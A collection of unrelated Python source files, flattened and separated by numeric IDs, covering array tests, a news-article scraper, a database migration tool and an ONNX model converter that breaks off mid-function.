import unittest import numpy from nlcpy import testing nan_dtypes = ( numpy.float32, numpy.float64, numpy.complex64, numpy.complex128, ) shapes = ( (4,), (3, 4), (2, 3, 4), ) @testing.parameterize(*( testing.product({ 'shape': shapes, }) )) class TestPtp(unittest.TestCase): # ndarray methods @testing.for_dtypes(['i', 'q', 'f', 'd', 'F', 'D']) @testing.numpy_nlcpy_array_equal() def test_case_mem_01(self, xp, dtype): a = testing.shaped_random(self.shape, xp, dtype) a = xp.asarray(a) return a.ptp() @testing.for_dtypes(['i', 'q', 'f', 'd', 'F', 'D']) @testing.numpy_nlcpy_array_equal() def test_case_mem_02(self, xp, dtype): a = testing.shaped_random(self.shape, xp, dtype) a = xp.asarray(a) return a.ptp(axis=0) @testing.numpy_nlcpy_array_equal() def test_me_case_mem_1(self, xp): x = xp.array([[4, 9, 2, 10], [6, 9, 7, 12]]) return x.ptp(axis=1) @testing.numpy_nlcpy_array_equal() def test_me_case_mem_2(self, xp): x = xp.array([[4, 9, 2, 10], [6, 9, 7, 12]]) return x.ptp(axis=0) @testing.numpy_nlcpy_array_equal() def test_me_case_mem_3(self, xp): x = xp.array([[1, 127], [0, 127], [-1, 127], [-2, 127]], dtype=xp.int32) return x.ptp(axis=1)
11569491
import requests import lxml from lxml import etree from lxml.html import fromstring root = etree.parse(r'C:\Users\Kiril\PycharmProjects\Diploma2020\data\corpus.xml') root = root.getroot() corpus = etree.SubElement(root, "corpus") source_examples = dict() text_num = dict() status_codes = dict() failed_elements = dict() count = 1214 download_version = "v1" user_agent = 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36' web_archive_page = "http://web.archive.org/web/" for element in root[1][1214:]: id = element[0].text text = element[1].text agency = element[2].text link = element[4].text date = element[5].text source_examples[agency] = element[4].text text_num[agency] = text_num.get(agency, 0) + 1 count += 1 processed_status = "Unknown agency '" + agency + "'" print("[" + str(count) + "]: id =", id, ", agency = ", agency, ", link = ", link, ", processed_status =", end=" ") try: with open("download/" + download_version + "/" + id + ".txt", 'w', encoding="utf-8") as outputFile: if agency == "РБК": rubrics = "none" response = requests.get(web_archive_page + link, cookies="", headers={'User-Agent': user_agent}) html = lxml.html.fromstring(response.text) elements_with_article = html.find_class("_ga1_on_ visible") if not elements_with_article: elements_with_article = html.find_class("article__text") rubrics = str([elm.text.strip() for elm in html.find_class("article__tags__link")]) for block in elements_with_article[0]: if block.tag != 'p': continue print(block.text_content(), file=outputFile, end="\n\n") processed_status = "Downloaded, rubrics: " + rubrics elif agency == "Лента.ру": rubrics = "none" response = requests.get(link) html = lxml.html.fromstring(response.text) elements_with_article = html.find_class("js-topic__text") for block in elements_with_article[0]: if block.tag != 'p': continue print(block.text_content(), file=outputFile, end="\n\n") processed_status = "Downloaded, rubrics: " + rubrics elif agency == "Российская газета": response = requests.get(link) html = lxml.html.fromstring(response.text) text_block = html.find_class("b-material-wrapper__text") for block in text_block[0]: if block.tag != 'p': continue print(block.text_content(), file=outputFile, end="\n\n") rubrics = str( [elm.text_content() for elm in html.find_class("b-material-wrapper__rubric")[0].find_class("b-link")]) processed_status = "Downloaded, rubrics: " + rubrics elif agency == "КоммерсантЪ": response = requests.get(link.strip()) html = lxml.html.fromstring(response.text) text_block = html.find_class("article_text_wrapper") for block in text_block[0][1:]: if block.tag != 'p': continue print(block.text_content(), file=outputFile, end="\n\n") rubrics = str([elm.text_content() for elm in html.find_class("doc_footer__subs_link")]) processed_status = "Downloaded, rubrics: " + rubrics elif agency == "РИА Новости": response = requests.get(link) html = lxml.html.fromstring(response.text) print(html.find_class("article__announce-text")[0].text_content(), file=outputFile, end="\n\n") text_block = html.find_class("article__text") for block in text_block: if block.text_content() == "": continue print(block.text_content(), file=outputFile, end="\n\n") rubrics = str([elm.text_content() for elm in html.find_class("article__tags-item")]) processed_status = "Downloaded, rubrics: " + rubrics elif agency == "ИноСМИ": response = requests.get(link) html = lxml.html.fromstring(response.text) text = etree.tounicode(html.find_class("article-body")[0][0]).replace("<p>", "").replace("</p>", "") for block in text.split("<br/><br/>"): print(block, file=outputFile, end="\n\n") rubrics = str([elm.text_content() for elm in html.find_class("article-header__story")]) processed_status = "Downloaded, rubrics: " + rubrics elif agency == "Фонтанка.ру": response = requests.get(link) html = lxml.html.fromstring(response.text) text_block = html.find_class("D5cr") for block in text_block: for sub_block in block: if sub_block.tag != 'p': continue print(sub_block.text_content(), file=outputFile, end="\n\n") rubrics = str([elm.text_content() for elm in html.find_class("GDhr")]) processed_status = "Downloaded, rubrics: " + rubrics else: print("Failed", file=outputFile) except Exception as err: processed_status = "Failed — " + str(err) print(processed_status) print("Completed!") print() print("Number of text from agency with one example: ") for i in source_examples: print(i, source_examples[i], "size: ", text_num[i]) print() print("Link status codes:") for i in status_codes: print("'", i, "' — ", status_codes[i])
11569509
import logging from scanner import barcode_reader # simple usage - in python 3 if __name__ == '__main__': try: while True: upcnumber = barcode_reader() print(upcnumber) except KeyboardInterrupt: logging.debug('Keyboard interrupt') except Exception as err: logging.error(err)
11569546
from collections import OrderedDict from .tensor import weighted_sum def average_state_dicts(dicts, weights=None): if not weights: weights = (1 / len(dicts),) * len(dicts) averaged = OrderedDict() for k in dicts[0]: averaged[k] = weighted_sum([d[k] for d in dicts], weights) return averaged
11569554
import lime import lime.lime_tabular import matplotlib as plt from django.core.management.base import BaseCommand from sklearn.externals import joblib from src.core.core import get_encoded_logs from src.encoding.common import retrieve_proper_encoder from src.jobs.models import Job class Command(BaseCommand): help = 'tries to deliver an explanation of a random prediction of the trained model' def handle(self, *args, **kwargs): #get model TARGET_MODEL=5 job = Job.objects.filter(pk=TARGET_MODEL)[0] model = joblib.load(job.predictive_model.model_path) #load data training_df, test_df = get_encoded_logs(job) #get radom point in evaluation set EXPLANATION_TARGET = 3 #get the actual explanation explainer = lime.lime_tabular.LimeTabularExplainer( training_df.drop(['trace_id', 'label'], 1).as_matrix(), feature_names=list(training_df.drop(['trace_id', 'label'], 1).columns.values), categorical_features=[i for i in range(len(list(training_df.drop(['trace_id', 'label'], 1).columns.values)))], verbose=True, mode='classification', ) exp = explainer.explain_instance( test_df.drop(['trace_id', 'label'], 1).iloc[EXPLANATION_TARGET], #TODO probably the opposite would be way less computationally intesive model[0].predict_proba, num_features=5 ) exp.as_list() #show plot #exp.show_in_notebook(show_table=True) # exp.as_pyplot_figure().show() exp.save_to_file('oi.html') print('done')
11569558
from PyQt5.QtWidgets import QApplication from client.client_gui import ClientWindow if __name__ == '__main__': import sys if len(sys.argv) < 5: print(f"Usage: {sys.argv[0].split('/')[-1]} <file name> <host address> <host port> <RTP port>") exit(-1) file_name, host_address, host_port, rtp_port = *sys.argv[1:], try: host_port = int(host_port) rtp_port = int(rtp_port) except ValueError: raise ValueError('port values should be integer') app = QApplication(sys.argv) client = ClientWindow(file_name, host_address, host_port, rtp_port) client.resize(400, 300) client.show() sys.exit(app.exec_())
11569567
from .__about__ import ( __license__, __copyright__, __url__, __contributors__, __version__, __doc__ ) # user-facing classes are exposed via __all__ from .data_types import * from .logging import make_logger from .runtime import * from .wiring import * # standard library from . import lib
11569582
import logging import glob import os import os.path import sys import re import subprocess import datetime import imp import warnings import traceback import importlib import inspect import sqlparse import click log = logging.getLogger('mschematool') DEFAULT_CONFIG_MODULE_NAME = 'mschematool_config' # Ignore warnings about installation of optimized versions # of packages - irrelevant for the use case. warnings.filterwarnings('ignore') ### Utility functions def _simplify_whitespace(s): return b' '.join(s.split()) def _assert_values_exist(d, *keys): for k in keys: assert d.get(k), 'No required value %r specified' % k def _import_class(cls_path): modname, _, clsname = cls_path.rpartition('.') mod = importlib.import_module(modname) return getattr(mod, clsname) ### Loading and processing configuration class Config(object): def __init__(self, verbose, config_path): self.verbose = verbose self.config_path = config_path self._module = None def _setup_logging(self): global log log.setLevel(logging.DEBUG) formatter = logging.Formatter('%(asctime)-15s %(message)s') console_handler = logging.StreamHandler(sys.stderr) console_handler.setFormatter(formatter) console_handler.setLevel(logging.DEBUG) if self.verbose: log.addHandler(console_handler) if hasattr(self.module, 'LOG_FILE'): file_handler = logging.FileHandler(self.module.LOG_FILE) file_handler.setLevel(logging.DEBUG) file_handler.setFormatter(formatter) log.addHandler(file_handler) def _load_config(self): if self._module is not None: return if not os.path.exists(self.config_path): msg = 'Configuration module %r does not exist' % self.config_path sys.stderr.write(msg + '\n') log.critical(msg) raise Exception(msg) try: self._module = imp.load_source('mschematool_config', self.config_path) except ImportError: msg = 'Cannot import mschematool config module' sys.stderr.write(msg + '\n') log.critical(msg) raise self._setup_logging() @property def module(self): self._load_config() return self._module def _sqlfile_to_statements(sql): """ Takes a SQL string containing 0 or more statements and returns a list of individual statements as strings. Comments and empty statements are ignored. """ statements = (sqlparse.format(stmt, strip_comments=True).strip() for stmt in sqlparse.split(sql)) return [stmt for stmt in statements if stmt] #### Migrations repositories class MigrationsRepository(object): """A repository of migrations is a place where all available migrations are stored (for example a directory with migrations as files). """ def get_migrations(self, exclude=None): """Return a sorted list of all migrations. In a common case a migration will be a filename, without a leading directory part. :param exclude: a list or set of migrations to exclude from the result """ raise NotImplementedError() def generate_migration_name(self, name, suffix): """Returns a name of a new migration. It will usually be a filename with a valid and unique name. :param name: human-readable name of a migration :param suffix: file suffix (extension) - eg. 'sql' """ return os.path.join(self.dir, 'm{datestr}_{name}.{suffix}'.format( datestr=datetime.datetime.utcnow().strftime('%Y%m%d%H%M%S'), name=name.replace(' ', '_'), suffix=suffix)) def migration_type(self, migration): """Recognize migration type based on a migration (usually a filename). :return: 'native' or 'py' """ if migration.endswith('.py'): return 'py' return 'native' class DirRepository(MigrationsRepository): """:class:`MigrationsRepository` implementation with migrations being files inside a directory ``dir``. Example filenames: - m20140615132455_init.sql - m20140615135414_insert3.py :param migration_patterns: a list of glob expressions for selecting valid migration filenames, relative to ``dir``. """ def __init__(self, dir, migration_patterns): self.dir = dir self.migration_patterns = migration_patterns def _get_all_filenames(self): filenames = [] for pattern in self.migration_patterns: p_filenames = glob.glob(os.path.join(self.dir, pattern)) filenames.extend(p_filenames) # lexicographical ordering filenames.sort() return filenames def get_migrations(self, exclude=None): filenames = self._get_all_filenames() filenames = [os.path.split(fn)[1] for fn in filenames] if exclude: filenames = set(filenames) - set(exclude) filenames = sorted(filenames) return filenames #### Database-independent interface for migration-related operations class MigrationsExecutor(object): """A class that executes migrations and stores information about execution. It will usually store this information inside a database for which migrations are tracked. :attr:`MigrationsExecutor.engine` is an engine name that can be referenced from a config module. :attr:`MigrationsExecutor.file_extensions` is a list of filename extensions specifying files which execution is supported, in addition to 'py' and the engine name. :param db_config: a dictionary with configuration for a single dbnick. :param repository: :class:`MigrationsRepository` implementation. """ engine = 'unknown' filename_extensions = [] def __init__(self, db_config, repository): self.db_config = db_config self.repository = repository @classmethod def supported_filename_globs(cls): def glob_from_ext(ext): return '*.%s' % ext default_globs = [glob_from_ext('py'), glob_from_ext(cls.engine)] custom_globs = [glob_from_ext(ext) for ext in cls.filename_extensions] return default_globs + custom_globs def initialize(self): """Initialize resources needed for tracking migrations. It will usually create a database table for storing information about executed migrations. """ raise NotImplementedError() def fetch_executed_migrations(self): """Return a list of executed migrations (filenames). """ raise NotImplementedError() def execute_python_migration(self, migration, module): """Execute a migration written as Python code, and store information about it. :param migration: migration (filename) to be executed :param module: Python module imported from the migration """ raise NotImplementedError() def execute_native_migration(self, migration): """Execute a migration in a format native to the DB (SQL file, CQL file etc.), and store information about it. :param migration: migration (filename) to be executed """ raise NotImplementedError() def _call_migrate(self, module, connection_param): """Subclasses should call this method instead of `module.migrate` directly, to support `db_config` optional argument. """ args = [connection_param] spec = inspect.getargspec(module.migrate) if len(spec.args) == 2: args.append(self.db_config) return module.migrate(*args) def execute_migration(self, migration_file_relative): """This recognizes migration type and executes either :method:`execute_python_migration` or :method:`execute_native_migration` """ migration_file = os.path.join(self.db_config['migrations_dir'], migration_file_relative) m_type = self.repository.migration_type(migration_file) if m_type == 'native': return self.execute_native_migration(migration_file) if m_type == 'py': module = imp.load_source('migration_module', migration_file) return self.execute_python_migration(migration_file, module) assert False, 'Unknown migration type %s' % migration_file ENGINE_TO_IMPL = { 'postgres': 'mschematool.executors.postgres.PostgresMigrations', 'cassandra': 'mschematool.executors.cassandradb.CassandraMigrations', 'sqlite3': 'mschematool.executors.sqlite3db.Sqlite3Migrations', } ### Integrating all the classes class MSchemaTool(object): def __init__(self, config, dbnick): self.config = config self.dbnick = dbnick if dbnick not in config.module.DATABASES: raise click.ClickException('Not found in DATABASES in config: %s, available: %s' % (dbnick, ', '.join(config.module.DATABASES.keys()))) self.db_config = config.module.DATABASES[dbnick] if 'engine' not in self.db_config or self.db_config['engine'] not in ENGINE_TO_IMPL: raise click.ClickException('Unknown or invalid engine specified for the database %s, choose one of %s' % (dbnick, ENGINE_TO_IMPL.keys())) engine_cls = _import_class(ENGINE_TO_IMPL[self.db_config['engine']]) self.repository = DirRepository(self.db_config['migrations_dir'], engine_cls.supported_filename_globs()) self.migrations = engine_cls(self.db_config, self.repository) def not_executed_migration_files(self): return self.repository.get_migrations(exclude=self.migrations.fetch_executed_migrations()) def execute_after_sync(self): after_sync = self.db_config.get('after_sync') if not after_sync: return msg = 'Executing after_sync command %r' % after_sync log.info(msg) click.echo(msg) os.system(after_sync)
11569615
import unittest from types import SimpleNamespace class TestCaseWithState(unittest.TestCase): state = SimpleNamespace()
11569672
def task_checker(): return {'actions': ["pyflakes sample.py"], 'file_dep': ["sample.py"]}
11569723
import json import os import csv import io import shutil def parseSong(song, extremeJSON): if (song['name_translation'] == ''): songName = song['name'] else: songName = song['name_translation'] for root, dirnames, filenames in os.walk('Songs'): if (songName in dirnames): if (songName+'.png' in os.listdir(root+"\\"+songName)): shutil.copyfile(root+'\\'+songName+'\\'+songName+'.png','Extreme Banners/ex_'+songName+'.png') for item in extremeJSON: if (song['name'] == item['name'] and song['name_translation'] ==item['name_translation']): item['jacket'] = 'ex_'+songName +'.png' item['folder'] = root.split('\\')[1] return print("NO MATCH: "+ songName) def main(): with io.open('../src/songs/extreme.json', encoding='utf-8') as extremeJSONFile: extremeJSON = json.load(extremeJSONFile) for song in extremeJSON: parseSong(song, extremeJSON) with io.open('extreme_out.json', encoding='utf-8', mode='w') as extremeOutJSONFile: json.dump(extremeJSON, extremeOutJSONFile) if __name__ == "__main__": main()
11569747
import traceback import util import sys import logging from onnx import numpy_helper from pb_wrapper import OnnxNode from type_converter import dtype_onnx2tl def new_opname(optype): if not hasattr(new_opname, 'opname_count'): new_opname.opname_count = {} if optype in new_opname.opname_count: new_opname.opname_count[optype] += 1 else: new_opname.opname_count[optype] = 0 return optype + str(new_opname.opname_count[optype]) # TODO: give it a class def error(msg): try: raise Exception(msg) except Exception as e: print(e) traceback.print_stack() # exit(1) def handle_pads(node, tensor_dict): if not 'pads' in node.attrs and node.attrs['auto_pad'] == 'NOTSET': error("'%s' for node '%s' must have a 'pads' attribute or a non-NOTSET 'auto_pad'"%(node.op_type, node.name)) if 'pads' in node.attrs and 'auto_pad' in node.attrs and node.attrs['auto_pad'] != 'NOTSET': error("'%s' for node '%s' cannot use 'pads' and non-NOTSET 'auto_pad' simultaneously"%(node.op_type, node.name)) if 'pads' in node.attrs: pad_shape = node.attrs['pads'] node.attrs['auto_pad'] = 'NOTSET' else: pad_shape = [0 for i in range(len(node.attrs['strides']) * 2)] return pad_shape def find_shape_in_tensor_dict(tensor_dict, name): value_infos = tensor_dict['__value_infos'] if name in value_infos: shape = list( d.dim_value if (d.dim_value > 0 and d.dim_param == "") else None for d in value_infos[name].type.tensor_type.shape.dim) return shape if name in tensor_dict and not tensor_dict[name]['dims'] is None \ and not tensor_dict[name]['dims'][0] is None: return tensor_dict[name]['dims'] return None def tensor_proto_to_tensor(tensor_proto): def tensor2list(onnx_tensor): # Use the onnx.numpy_helper because the data may be raw return numpy_helper.to_array(onnx_tensor).flatten().tolist() tp = tensor_proto tensor = (tp.name, {'name': tp.name, 'dtype': dtype_onnx2tl(tp.name, tp.data_type), 'dims': list(d for d in tp.dims), 'data': tensor2list(tp)}) return tensor def new_create_op(tensor): data = [0] if tensor['data'] is None else tensor['data'] op = {'name': new_opname("create"), 'optype': 'create', 'tensors_in': [], 'tensors_out': [{'arg_name': 'dst', 'name': tensor['name']}], 'params': [{'arg_name': 'dtype', 'value': tensor['dtype']}, {'arg_name': 'dims', 'value': tensor['dims']}, {'arg_name': 'data', 'value': data}, {'arg_name': 'ran', 'value': [0, 0]}, {'arg_name': 'from_file', 'value': False}]} return op def Add(node, tensor_dict): assert node.op_type == 'Add' tensor_dict[node.outputs[0]] = {'name': node.outputs[0], 'dtype': tensor_dict[node.inputs[0]]['dtype'], 'dims': None, # TODO: do shape inference 'data': None} op = {'name': new_opname('elew'), 'optype': 'elew', 'tensors_in': [{'arg_name': 'src1', 'name': node.inputs[0]}, {'arg_name': 'src2', 'name': node.inputs[1]}], 'tensors_out': [{'arg_name': 'dst', 'name': node.outputs[0]}], 'params': [{'arg_name': 'elew_op', 'value': 'TL_ADD'}]} return [op] def ArgMax(node, tensor_dict): assert node.op_type == 'ArgMax' if 'keepdims' in node.attrs and node.attrs['keepdims'] == 0: error("'%s' for node '%s' only support 'keepdims' == 1 now"%(node.op_type, node.name)) opname = new_opname('maxreduce_arg') # use it to generate ignored 'dst' name tensor_dict[node.outputs[0]] = {'name': opname+'_dst_ln_', 'dtype': tensor_dict[node.inputs[0]]['dtype'], 'dims': None, # TODO: do shape inference 'data': None} tensor_dict[node.outputs[0]] = {'name': node.outputs[0], 'dtype': "TL_INT32", 'dims': None, # TODO: do shape inference 'data': None} op = {'name': opname, 'optype': 'maxreduce_arg', 'tensors_in': [{'arg_name': 'src', 'name': node.inputs[0]}], 'tensors_out': [{'arg_name': 'dst', 'name': opname+'_dst_ln_'}, {'arg_name': 'arg', 'name': node.outputs[0]}], 'params': [{'arg_name': 'axis', 'value': node.attrs['axis']}]} return [op] def AveragePool(node, tensor_dict): assert node.op_type == 'AveragePool' if len(node.attrs['kernel_shape']) != 2: error("'%s' for node '%s' only supports 2-d tensors now"%(node.op_type, node.name)) pad_shape = handle_pads(node, tensor_dict) tensor_dict[node.outputs[0]] = {'name': node.outputs[0], 'dtype': tensor_dict[node.inputs[0]]['dtype'], 'dims': None, # TODO: do shape inference 'data': None} op = {'name': new_opname('avgpool2d'), 'optype': 'avgpool2d', 'tensors_in': [{'arg_name': 'src', 'name': node.inputs[0]}], 'tensors_out': [{'arg_name': 'dst', 'name': node.outputs[0]}], 'params': [{'arg_name': 'size', 'value': node.attrs['kernel_shape']}, {'arg_name': 'stride', 'value': node.attrs['strides']}, {'arg_name': 'padding', 'value': pad_shape}, {'arg_name': 'autopad', 'value': node.attrs['auto_pad']}]} return [op] def BatchNormalization(node, tensor_dict): assert node.op_type == 'BatchNormalization' if not 'epsilon' in node.attrs: epsilon = 1e-5 else: epsilon = node.attrs['epsilon'] tensor_dict[node.outputs[0]] = {'name': node.outputs[0], 'dtype': tensor_dict[node.inputs[0]]['dtype'], 'dims': None, # TODO: do shape inference 'data': None} op = {'name': new_opname('batchnorm'), 'optype': 'batchnorm', 'tensors_in': [{'arg_name': 'src', 'name': node.inputs[0]}, {'arg_name': 'scale', 'name': node.inputs[1]}, {'arg_name': 'offset', 'name': node.inputs[2]}, {'arg_name': 'mean', 'name': node.inputs[3]}, {'arg_name': 'var', 'name': node.inputs[4]}], 'tensors_out': [{'arg_name': 'dst', 'name': node.outputs[0]}], 'params': [{'arg_name': 'epsilon', 'value': epsilon}]} return [op] def Concat(node, tensor_dict): assert node.op_type == 'Concat' if len(node.inputs) != 2: error("'%s' for node '%s' only supports 2 input tensors now"%(node.op_type, node.name)) tensor_dict[node.outputs[0]] = {'name': node.outputs[0], 'dtype': tensor_dict[node.inputs[0]]['dtype'], 'dims': None, # TODO: do shape inference 'data': None} op = {'name': new_opname('concat'), 'optype': 'concat', 'tensors_in': [{'arg_name': 'src1', 'name': node.inputs[0]}, {'arg_name': 'src2', 'name': node.inputs[1]}], 'tensors_out': [{'arg_name': 'dst', 'name': node.outputs[0]}], 'params': [{'arg_name': 'axis', 'value': node.attrs['axis']}]} return [op] def Conv(node, tensor_dict): assert node.op_type == 'Conv' if len(node.attrs['strides']) != 2: error("'%s' for node '%s' only supports 2-d tensors now"%(node.op_type, node.name)) if not 'kernel_shape' in node.attrs: error("'%s' for node '%s' must have a 'kernel_shape' attribute now"%(node.op_type, node.name)) pad_shape = handle_pads(node, tensor_dict) tensor_dict[node.outputs[0]] = {'name': node.outputs[0], 'dtype': tensor_dict[node.inputs[0]]['dtype'], 'dims': None, # TODO: do shape inference 'data': None} if len(node.inputs) == 2: bias_name = node.name + ".bias" node.inputs.append(node.name + ".bias") src_shape = find_shape_in_tensor_dict(tensor_dict, node.inputs[0]) # print(src_shape, file=sys.stderr) bias_len = src_shape[1] tensor_dict[bias_name] = { 'name': bias_name, 'dtype': tensor_dict[node.inputs[0]]['dtype'], 'dims': [bias_len], 'data': [0 for i in range(bias_len)] } op = {'name': new_opname('conv2d'), 'optype': 'conv2d', 'tensors_in': [{'arg_name': 'src', 'name': node.inputs[0]}, {'arg_name': 'weight', 'name': node.inputs[1]}, {'arg_name': 'bias', 'name': node.inputs[2]}], 'tensors_out': [{'arg_name': 'dst', 'name': node.outputs[0]}], 'params': [{'arg_name': 'group', 'value': node.attrs['group']}, {'arg_name': 'size', 'value': node.attrs['kernel_shape']}, {'arg_name': 'stride', 'value': node.attrs['strides']}, {'arg_name': 'padding', 'value': pad_shape}, {'arg_name': 'autopad', 'value': node.attrs['auto_pad']}, {'arg_name': 'dilation', 'value': node.attrs['dilations']}]} return [op] def Constant(node, tensor_dict): assert node.op_type == 'Constant' if 'value' in node.attrs: tensor = tensor_proto_to_tensor(node.attrs['value'])[1] elif 'value_float' in node.attrs: tensor = {'dtype': 'TL_FLOAT', 'dims': [1], 'data': node.attrs['value_float']} elif 'value_floats' in node.attrs: tensor = {'dtype': 'TL_FLOAT', 'dims': [len(node.attrs['value_floats'])], 'data': node.attrs['value_floats']} elif 'value_int' in node.attrs: tensor = {'dtype': 'TL_INT64', 'dims': [1], 'data': node.attrs['value_int']} elif 'value_ints' in node.attrs: tensor = {'dtype': 'TL_INT64', 'dims': [len(node.attrs['value_ints'])], 'data': node.attrs['value_ints']} else: error('Unsupported Constant attribute: %s'%node.attrs.keys()) tensor_dict[node.outputs[0]] = {'name': node.outputs[0], 'dtype': tensor['dtype'], 'dims': None, # TODO: do shape inference 'data': None} op = {'name': new_opname('create'), 'optype': 'create', 'tensors_in': [], 'tensors_out': [{'arg_name': 'dst', 'name': node.outputs[0]}], 'params': [{'arg_name': 'dtype', 'value': tensor['dtype']}, {'arg_name': 'dims', 'value': tensor['dims']}, {'arg_name': 'data', 'value': tensor['data']}, {'arg_name': 'ran', 'value': [0, 0]}, {'arg_name': 'from_file', 'value': False}]} return [op] def Div(node, tensor_dict): assert node.op_type == 'Div' tensor_dict[node.outputs[0]] = {'name': node.outputs[0], 'dtype': tensor_dict[node.inputs[0]]['dtype'], 'dims': None, # TODO: do shape inference 'data': None} op = {'name': new_opname('elew'), 'optype': 'elew', 'tensors_in': [{'arg_name': 'src1', 'name': node.inputs[0]}, {'arg_name': 'src2', 'name': node.inputs[1]}], 'tensors_out': [{'arg_name': 'dst', 'name': node.outputs[0]}], 'params': [{'arg_name': 'elew_op', 'value': 'TL_DIV'}]} return [op] # Dropout treated as a Forward op def Dropout(node, tensor_dict): assert node.op_type == 'Dropout' tensor_dict[node.outputs[0]] = {'name': node.outputs[0], 'dtype': tensor_dict[node.inputs[0]]['dtype'], 'dims': None, # TODO: do shape inference 'data': None} op = {'name': new_opname('forward'), 'optype': 'forward', 'tensors_in': [{'arg_name': 'src', 'name': node.inputs[0]}], 'tensors_out': [{'arg_name': 'dst', 'name': node.outputs[0]}], 'params': []} return [op] def LeakyRelu(node, tensor_dict): assert node.op_type == 'LeakyRelu' if not 'alpha' in node.attrs: alpha = 0.01 else: alpha = node.attrs['alpha'] tensor_dict[node.outputs[0]] = {'name': node.outputs[0], 'dtype': tensor_dict[node.inputs[0]]['dtype'], 'dims': None, # TODO: do shape inference 'data': None} op = {'name': new_opname('lrelu'), 'optype': 'lrelu', 'tensors_in': [{'arg_name': 'src', 'name': node.inputs[0]}], 'tensors_out': [{'arg_name': 'dst', 'name': node.outputs[0]}], 'params': [{'arg_name': 'negslope', 'value': alpha}]} return [op] def MaxPool(node, tensor_dict): assert node.op_type == 'MaxPool' if len(node.attrs['kernel_shape']) != 2: error("'%s' for node '%s' only supports 2-d tensors now"%(node.op_type, node.name)) pad_shape = handle_pads(node, tensor_dict) tensor_dict[node.outputs[0]] = {'name': node.outputs[0], 'dtype': tensor_dict[node.inputs[0]]['dtype'], 'dims': None, # TODO: do shape inference 'data': None} op = {'name': new_opname('maxpool2d'), 'optype': 'maxpool2d', 'tensors_in': [{'arg_name': 'src', 'name': node.inputs[0]}], 'tensors_out': [{'arg_name': 'dst', 'name': node.outputs[0]}], 'params': [{'arg_name': 'size', 'value': node.attrs['kernel_shape']}, {'arg_name': 'stride', 'value': node.attrs['strides']}, {'arg_name': 'padding', 'value': pad_shape}, {'arg_name': 'autopad', 'value': node.attrs['auto_pad']}]} return [op] def Pow(node, tensor_dict): assert node.op_type == 'Pow' tensor_dict[node.outputs[0]] = {'name': node.outputs[0], 'dtype': tensor_dict[node.inputs[0]]['dtype'], 'dims': None, # TODO: do shape inference 'data': None} op = {'name': new_opname('elew'), 'optype': 'elew', 'tensors_in': [{'arg_name': 'src1', 'name': node.inputs[0]}, {'arg_name': 'src2', 'name': node.inputs[1]}], 'tensors_out': [{'arg_name': 'dst', 'name': node.outputs[0]}], 'params': [{'arg_name': 'elew_op', 'value': 'TL_POW'}]} return [op] def ReduceMax(node, tensor_dict): assert node.op_type == 'ReduceMax' if not 'axes' in node.attrs or len(node.attrs['axes']) > 1: error("'%s' for node '%s' only suppport 'axes' have one element now"%(node.op_type, node.name)) if 'keepdims' in node.attrs and node.attrs['keepdims'] == 0: error("'%s' for node '%s' only suppport 'keepdims' == 1 now"%(node.op_type, node.name)) tensor_dict[node.outputs[0]] = {'name': node.outputs[0], 'dtype': tensor_dict[node.inputs[0]]['dtype'], 'dims': None, # TODO: do shape inference 'data': None} op = {'name': new_opname('maxreduce'), 'optype': 'maxreduce', 'tensors_in': [{'arg_name': 'src', 'name': node.inputs[0]}], 'tensors_out': [{'arg_name': 'dst', 'name': node.outputs[0]}], 'params': [{'arg_name': 'axes', 'value': node.attrs['axes'][0]}]} return [op] def Relu(node, tensor_dict): assert node.op_type == 'Relu' tensor_dict[node.outputs[0]] = {'name': node.outputs[0], 'dtype': tensor_dict[node.inputs[0]]['dtype'], 'dims': None, # TODO: do shape inference 'data': None} op = {'name': new_opname('relu'), 'optype': 'relu', 'tensors_in': [{'arg_name': 'src', 'name': node.inputs[0]}], 'tensors_out': [{'arg_name': 'dst', 'name': node.outputs[0]}], 'params': []} return [op] def Reshape(node, tensor_dict): assert node.op_type == 'Reshape' assert node.inputs[1] in tensor_dict shape = find_shape_in_tensor_dict(tensor_dict, node.outputs[0]) if shape is not None: new_shape = shape elif tensor_dict[node.inputs[1]]['data'] is not None: new_shape = tensor_dict[node.inputs[1]]['data'] else: error("'%s' for node '%s' doesn't support dynamically supplied 'shape' tensor '%s' now"%(node.op_type, node.name, node.inputs[1])) tensor_dict[node.outputs[0]] = {'name': node.outputs[0], 'dtype': tensor_dict[node.inputs[0]]['dtype'], 'dims': None, # TODO: do shape inference 'data': None} op = {'name': new_opname('reshape'), 'optype': 'reshape', 'tensors_in': [{'arg_name': 'src', 'name': node.inputs[0]}], 'tensors_out': [{'arg_name': 'dst', 'name': node.outputs[0]}], 'params': [{'arg_name': 'dims', 'value': new_shape}]} return [op] def Resize(node, tensor_dict): assert node.op_type == 'Resize' if not 'mode' in node.attrs: mode = 'TL_NEAREST' elif node.attrs['mode'] == 'nearest': mode = 'TL_NEAREST' elif node.attrs['mode'] == 'linear': mode = 'TL_LINEAR' else: error("'%s' for node '%s' doesn't support 'mode' == '%s'"%(node.op_type, node.name, node.attrs['mode'])) assert node.inputs[1] in tensor_dict if tensor_dict[node.inputs[1]]['data'] is None: error("'%s' for node '%s' doesn't support dynamically supplied 'scales' tensor now"%(node.op_type, node.name)) tensor_dict[node.outputs[0]] = {'name': node.outputs[0], 'dtype': tensor_dict[node.inputs[0]]['dtype'], 'dims': None, # TODO: do shape inference 'data': None} op = {'name': new_opname('resize'), 'optype': 'resize', 'tensors_in': [{'arg_name': 'src', 'name': node.inputs[0]}], 'tensors_out': [{'arg_name': 'dst', 'name': node.outputs[0]}], 'params': [{'arg_name': 'mode', 'value': mode}, {'arg_name': 'scales', 'value': tensor_dict[node.inputs[1]]['data']}]} return [op] def Sigmoid(node, tensor_dict): assert node.op_type == 'Sigmoid' tensor_dict[node.outputs[0]] = {'name': node.outputs[0], 'dtype': tensor_dict[node.inputs[0]]['dtype'], 'dims': None, # TODO: do shape inference 'data': None} op = {'name': new_opname('sigmoid'), 'optype': 'sigmoid', 'tensors_in': [{'arg_name': 'src', 'name': node.inputs[0]}], 'tensors_out': [{'arg_name': 'dst', 'name': node.outputs[0]}], 'params': []} return [op] def Slice(node, tensor_dict): assert node.op_type == 'Slice' assert node.inputs[1] in tensor_dict assert node.inputs[2] in tensor_dict assert node.inputs[3] in tensor_dict assert node.inputs[4] in tensor_dict if tensor_dict[node.inputs[1]]['data'] is None: error("'%s' for node '%s' doesn't support dynamically supplied 'starts' tensor now"%(node.op_type, node.name)) if tensor_dict[node.inputs[2]]['data'] is None: 